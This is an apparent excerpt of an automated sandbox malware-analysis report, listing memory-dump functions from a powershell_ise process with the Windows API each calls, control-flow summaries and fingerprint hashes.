                                  • Source File: 00000006.00000002.1027088783.00000000001BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1ba000_powershell_ise.jbxd
                                  Similarity
                                  • API ID: InformationModule
                                  • String ID:
                                  • API String ID: 3425974696-0
                                  • Opcode ID: 78651bab0f6ee68c5c01017b552075251c5ada576b6b056e5e81d4d0acdcf1ca
                                  • Instruction ID: 306f130e8357d64f37ee5821e15fc9dab80605dbdc7b93324e21100cfa04a163
                                  • Opcode Fuzzy Hash: 78651bab0f6ee68c5c01017b552075251c5ada576b6b056e5e81d4d0acdcf1ca
                                  • Instruction Fuzzy Hash: D2119375600204AFFB21CF55DC85FA6BBE8EF44720F14856AED49CB241D774E9098B72
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001BA873 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 126 1ba873-1ba8c1 128 1ba8c3 126->128 129 1ba8c6-1ba8cc 126->129 128->129 130 1ba8ce 129->130 131 1ba8d1-1ba8da 129->131 130->131 132 1ba91d-1ba922 131->132 133 1ba8dc-1ba8e4 LookupPrivilegeValueW 131->133 132->133 134 1ba8ea-1ba8fc 133->134 136 1ba8fe-1ba91a 134->136 137 1ba924-1ba929 134->137 137->136
                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 001BA8E2
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1027088783.00000000001BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1ba000_powershell_ise.jbxd
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: 164ff5a53700484a39f9220119704921608b2a60d22c38b8078955c0782fc64d
                                  • Instruction ID: 1e250d1a054a4f2462e8e417dc45ddd726702f8bf4536e526794e29c2efed1c4
                                  • Opcode Fuzzy Hash: 164ff5a53700484a39f9220119704921608b2a60d22c38b8078955c0782fc64d
                                  • Instruction Fuzzy Hash: 592145715053805FD721CF25DC44B62BFA8EF46624F0884AAED85CB652D375E804DB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001BAD2A Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 139 1bad2a-1bad7e 142 1badcb-1badd0 139->142 143 1bad80-1bad88 K32EnumProcessModules 139->143 142->143 145 1bad8e-1bada0 143->145 146 1badd2-1badd7 145->146 147 1bada2-1badc8 145->147 146->147
                                  APIs
                                  • K32EnumProcessModules.KERNEL32(?,00000E40,C28137B5,00000000,00000000,00000000,00000000), ref: 001BAD86
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1027088783.00000000001BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1ba000_powershell_ise.jbxd
                                  Similarity
                                  • API ID: EnumModulesProcess
                                  • String ID:
                                  • API String ID: 1082081703-0
                                  • Opcode ID: 1dfe5764aded46336065cd276073368ac1ea34ff115468137c927c8529175a3d
                                  • Instruction ID: df7d2c4d2589b6df159ee90db105cf99b7ce8c7327d51b156804c8f34eb559e4
                                  • Opcode Fuzzy Hash: 1dfe5764aded46336065cd276073368ac1ea34ff115468137c927c8529175a3d
                                  • Instruction Fuzzy Hash: B911C472500204AFFB61CF55DC85FA6FBE8EF44320F14856AEE49CA641D774A9058BB2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001BA89A Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 150 1ba89a-1ba8c1 151 1ba8c3 150->151 152 1ba8c6-1ba8cc 150->152 151->152 153 1ba8ce 152->153 154 1ba8d1-1ba8da 152->154 153->154 155 1ba91d-1ba922 154->155 156 1ba8dc-1ba8e4 LookupPrivilegeValueW 154->156 155->156 157 1ba8ea-1ba8fc 156->157 159 1ba8fe-1ba91a 157->159 160 1ba924-1ba929 157->160 160->159
                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 001BA8E2
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1027088783.00000000001BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1ba000_powershell_ise.jbxd
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: 75e3532d2d1b7a741bfe5bdad06aa29b158adbee846cd047982d840a2ee58337
                                  • Instruction ID: 06a5e0f706af8ce30b19422726feb005e74777f7697bccae1bdf3c20e37994f1
                                  • Opcode Fuzzy Hash: 75e3532d2d1b7a741bfe5bdad06aa29b158adbee846cd047982d840a2ee58337
                                  • Instruction Fuzzy Hash: D11130766002009BEB50CF25D8857A6BBE8EF44721F08846ADD49CB641E375E905DB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001BAF32 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 172 1baf32-1baf84 K32GetModuleBaseNameW 174 1baf8a-1bafb3 172->174
                                  APIs
                                  • K32GetModuleBaseNameW.KERNEL32(?,00000E40,?,?), ref: 001BAF82
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1027088783.00000000001BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1ba000_powershell_ise.jbxd
                                  Similarity
                                  • API ID: BaseModuleName
                                  • String ID:
                                  • API String ID: 595626670-0
                                  • Opcode ID: a9e7f96637b1b7b9831328a63b843e09836788ec6e701a4b5b7eddb0ecfadc31
                                  • Instruction ID: d72d6e148e69b0bf67faeb85cd10f9882a55ec0b3aa4f49c5c18eea5fcbefa98
                                  • Opcode Fuzzy Hash: a9e7f96637b1b7b9831328a63b843e09836788ec6e701a4b5b7eddb0ecfadc31
                                  • Instruction Fuzzy Hash: FC017171A40200ABE710DF16DC85B66FBA8FF84A20F14856AED089B745D231B516CBE6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001BA76E Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegQueryValueExW.KERNEL32(?,00000E40,?,?), ref: 001BA7BE
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1027088783.00000000001BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1ba000_powershell_ise.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: 4c84c80ab7c837484de3af77e0d0b203d525813cb28d8b2247a7feed27056afa
                                  • Instruction ID: 536c551b117c3df3aee77408e8714d7480aca3bfb7eeb1c9059a6e646ef0cbc8
                                  • Opcode Fuzzy Hash: 4c84c80ab7c837484de3af77e0d0b203d525813cb28d8b2247a7feed27056afa
                                  • Instruction Fuzzy Hash: D8016271A40204ABE210DF16DC86B26FBA8FF88B20F14815AED085B745D271F516CBE6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001BAB4C Relevance: 1.3, APIs: 1, Instructions: 68COMMON
                                  Download Yara Rule
                                  APIs
                                  • CloseHandle.KERNELBASE(?), ref: 001BABB8
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1027088783.00000000001BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1ba000_powershell_ise.jbxd
                                  Similarity
                                  • API ID: CloseHandle
                                  • String ID:
                                  • API String ID: 2962429428-0
                                  • Opcode ID: 3b0de3c00c6850b13f316580a4b1e6866aac3fded5cb4957e4beccfb58d28b02
                                  • Instruction ID: a4108cae10f7d51b9475fb5f00e269d6b8e1f8eb67b847cfc5eca79f9f73a8d6
                                  • Opcode Fuzzy Hash: 3b0de3c00c6850b13f316580a4b1e6866aac3fded5cb4957e4beccfb58d28b02
                                  • Instruction Fuzzy Hash: 3421A1725093C09FDB028B25DD94692BFB4AF07324F0984DBED858F263D2659908CB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001BA309 Relevance: 1.3, APIs: 1, Instructions: 65COMMON
                                  Download Yara Rule
                                  APIs
                                  • CloseHandle.KERNELBASE(?), ref: 001BA378
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1027088783.00000000001BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1ba000_powershell_ise.jbxd
                                  Similarity
                                  • API ID: CloseHandle
                                  • String ID:
                                  • API String ID: 2962429428-0
                                  • Opcode ID: d4ebc9db406dec2fd5e2ab84040e89bd16c244c2c41dcc0e85dc41ae62c44683
                                  • Instruction ID: a22e9d305645952735878e5f39973daf3fa255a0c677898f369df6a6d94aad29
                                  • Opcode Fuzzy Hash: d4ebc9db406dec2fd5e2ab84040e89bd16c244c2c41dcc0e85dc41ae62c44683
                                  • Instruction Fuzzy Hash: 1C2181715093C49FD7128B25DC95791BFB4EF46224F0884EBDD858F6A2D334A908CB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001BAB86 Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                  Download Yara Rule
                                  APIs
                                  • CloseHandle.KERNELBASE(?), ref: 001BABB8
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1027088783.00000000001BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1ba000_powershell_ise.jbxd
                                  Similarity
                                  • API ID: CloseHandle
                                  • String ID:
                                  • API String ID: 2962429428-0
                                  • Opcode ID: 273af7938bc3a36022fdfa0bb0a41d79bd6efdeec4e8219a84f45a929069d09c
                                  • Instruction ID: a25f075392bfa20cb02486c342460e7dd4b19fb2372f431a1f4972cbed88eeb8
                                  • Opcode Fuzzy Hash: 273af7938bc3a36022fdfa0bb0a41d79bd6efdeec4e8219a84f45a929069d09c
                                  • Instruction Fuzzy Hash: 0401DF765002408BEB10CF29D984792FBA4EF40320F08C0AADD498B342D375E848CBA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001BA346 Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                  Download Yara Rule
                                  APIs
                                  • CloseHandle.KERNELBASE(?), ref: 001BA378
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1027088783.00000000001BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1ba000_powershell_ise.jbxd
                                  Similarity
                                  • API ID: CloseHandle
                                  • String ID:
                                  • API String ID: 2962429428-0
                                  • Opcode ID: f758074a0742fb09d47d6561b3890d1347126e64544b1fb1721877b6373f0296
                                  • Instruction ID: aa26f8f0ad670b8714fe74cc76b4fdfe6e843062b82f6197f75afa6823960b33
                                  • Opcode Fuzzy Hash: f758074a0742fb09d47d6561b3890d1347126e64544b1fb1721877b6373f0296
                                  • Instruction Fuzzy Hash: 7801DF755002409FEB118F25D8847A5FBE4EF44320F48C4ABDD49CB352D378A904CBA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002507F7 Relevance: .0, Instructions: 45COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1027139395.0000000000250000.00000040.00000020.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_250000_powershell_ise.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e9f6bc3d00a3b40f37b57e1a99ab47a7d6f641c6c62f3a800f59c0730603e2e9
                                  • Instruction ID: 6870fad21923e9758152474c6b93d1c239901706c5f7f617e78b1f6f6ca93ae3
                                  • Opcode Fuzzy Hash: e9f6bc3d00a3b40f37b57e1a99ab47a7d6f641c6c62f3a800f59c0730603e2e9
                                  • Instruction Fuzzy Hash: 3AF0AEB65093806FD7128B15AC40863FFB8EF86630709C4AFED4D8B611D129B909CB71
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0025081E Relevance: .0, Instructions: 27COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1027139395.0000000000250000.00000040.00000020.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_250000_powershell_ise.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 37e75f24cc9b75ed20092755f748b243df1539636d3eb226d19e7df94b701d5d
                                  • Instruction ID: 9ce943b1bd5722e7123ce363fa4e5d4deae375218dca6f429be91a260d3bd4c0
                                  • Opcode Fuzzy Hash: 37e75f24cc9b75ed20092755f748b243df1539636d3eb226d19e7df94b701d5d
                                  • Instruction Fuzzy Hash: 91E092B66047009BD650CF0AEC81462F7A4EF84630B08C47FDD0D8B700E13AB509CAA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001B23F4 Relevance: .0, Instructions: 15COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1027082920.00000000001B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B2000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1b2000_powershell_ise.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d548195a0970d3a48c08a498fc1e4221a1f559e881570dc34d3c9d6188093f96
                                  • Instruction ID: 9f2413869de2e98d4da0069d94564d29b6d043073665f3335afa3e74b4bbc6f8
                                  • Opcode Fuzzy Hash: d548195a0970d3a48c08a498fc1e4221a1f559e881570dc34d3c9d6188093f96
                                  • Instruction Fuzzy Hash: DCD05E793046814FE7169B1CC1A4BD53BD4AF91B05F5644FAE844CBAA3C378D985D200
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001B23BC Relevance: .0, Instructions: 14COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1027082920.00000000001B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B2000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1b2000_powershell_ise.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cd4d2e6ed11bcb9d10a0c8dd736c2691efc3f2a787622d3552d5f08b8887ea76
                                  • Instruction ID: 267e6f482db5bdc7516d358811f05fc8bbe915e8ba20fd42123205e828e04acb
                                  • Opcode Fuzzy Hash: cd4d2e6ed11bcb9d10a0c8dd736c2691efc3f2a787622d3552d5f08b8887ea76
                                  • Instruction Fuzzy Hash: 77D05E343001814FDB15DA0CC294F9973E4BF84704F0644E8EC108B276C3B8DDC5C600
                                  Uniqueness

                                  Uniqueness Score: -1.00%